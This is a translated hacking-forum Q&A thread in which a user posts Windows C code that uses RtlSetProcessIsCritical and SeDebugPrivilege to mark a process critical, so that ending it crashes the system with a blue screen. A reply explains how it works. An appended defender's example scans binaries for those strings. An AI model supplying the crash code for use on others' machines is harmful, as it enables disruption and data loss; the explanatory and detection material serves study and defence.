Programming

h@cking2013
Blue screen source

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_programming&no=6450


Hello.
I happened to come across source code on the Internet that brings up a blue screen.

#include <windows.h>

typedef VOID ( _stdcall *RtlSetProcessIsCritical ) (
               IN BOOLEAN        NewValue,
               OUT PBOOLEAN OldValue,
               IN BOOLEAN      IsWinlogon );

BOOL EnablePriv(LPCSTR lpszPriv)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    ZeroMemory(&tkprivs, sizeof(tkprivs));

    if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
        return FALSE;

    if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){
        CloseHandle(hToken); return FALSE;
    }

    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
    CloseHandle(hToken);
    return bRet;
}

BOOL ProtectProcess()
{
    HANDLE hDLL;
    RtlSetProcessIsCritical fSetCritical;

    hDLL = LoadLibraryA("ntdll.dll");
    if ( hDLL != NULL )
    {
        EnablePriv(SE_DEBUG_NAME);
        (fSetCritical) = (RtlSetProcessIsCritical) GetProcAddress( (HINSTANCE)hDLL, "RtlSetProcessIsCritical" );
        if(!fSetCritical) return 0;
        fSetCritical(1,0,0);
        return 1;
    } else
        return 0;
}

int main (void)
{
    ProtectProcess();
    return 1;
}

How does this work?

  Hit : 6639     Date : 2014/03/23 03:12



    
MainThread: It obtains the RtlSetProcessIsCritical function through the DLL file called hDLL.
- RtlSetProcessIsCritical is a function for creating a critical process.
- A critical process is a process that is not terminated, that is, a process that triggers a blue screen.

If you want to know more about GetProcAddress, take a look at MSDN.
From MainThread
2014/05/24
h@cking2013: Thank you! 2014/07/30
김병권: A long time ago someone told me over NateOn to try bringing up a blue screen...
I remember that now. Thanks for the good information... haha
2015/02/01
김병권: Even though it has been about 6 years, I do still remember it, hahaha 2015/02/01
somass: Thank you 2022/09/16
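
As the answer notes, the posted code looks the function up by name with GetProcAddress, so the name is stored as a plain string in the compiled file even though it is not in the import table. The following is an added example for defenders, not code from this thread: a portable C routine that flags a file image containing that name or the SeDebugPrivilege string (the value of SE_DEBUG_NAME). The names scan_markers and HIT_*, and the sample buffers, are assumptions constructed for illustration; a string hit is only a triage signal.

```c
#include <stdio.h>
#include <string.h>

#define HIT_API   0x1  /* "RtlSetProcessIsCritical" (GetProcAddress takes ANSI names) */
#define HIT_PRIV  0x2  /* "SeDebugPrivilege", the value of SE_DEBUG_NAME */

/* Find `needle` in buf as ASCII (wide == 0) or UTF-16LE (wide == 1). */
static int contains(const unsigned char *buf, size_t len, const char *needle, int wide)
{
    size_t n = strlen(needle), step = wide ? 2 : 1;
    if (n == 0 || len < n * step)
        return 0;
    for (size_t i = 0; i + n * step <= len; i++) {
        size_t j = 0;
        while (j < n && buf[i + j * step] == (unsigned char)needle[j] &&
               (!wide || buf[i + j * step + 1] == 0))
            j++;
        if (j == n)
            return 1;
    }
    return 0;
}

/* Return a bitmask of the markers present in a file image held in memory. */
int scan_markers(const unsigned char *buf, size_t len)
{
    int hits = 0;
    if (contains(buf, len, "RtlSetProcessIsCritical", 0))
        hits |= HIT_API;
    if (contains(buf, len, "SeDebugPrivilege", 0) ||
        contains(buf, len, "SeDebugPrivilege", 1))   /* UNICODE builds store it wide */
        hits |= HIT_PRIV;
    return hits;
}

/* Constructed sample buffers, not taken from any real binary. */
static const unsigned char sample_ansi[] =
    "\x90\x90ntdll.dll\0RtlSetProcessIsCritical\0SeDebugPrivilege\0\xcc";
static const unsigned char sample_wide[] =
    "S\0e\0D\0e\0b\0u\0g\0P\0r\0i\0v\0i\0l\0e\0g\0e\0\0\0";
static const unsigned char sample_clean[] = "kernel32.dll\0GetTickCount\0";

int main(void)
{
    printf("ansi=%d ", scan_markers(sample_ansi, sizeof sample_ansi));
    printf("wide=%d ", scan_markers(sample_wide, sizeof sample_wide));
    printf("clean=%d\n", scan_markers(sample_clean, sizeof sample_clean));
    return 0;
}
```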

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org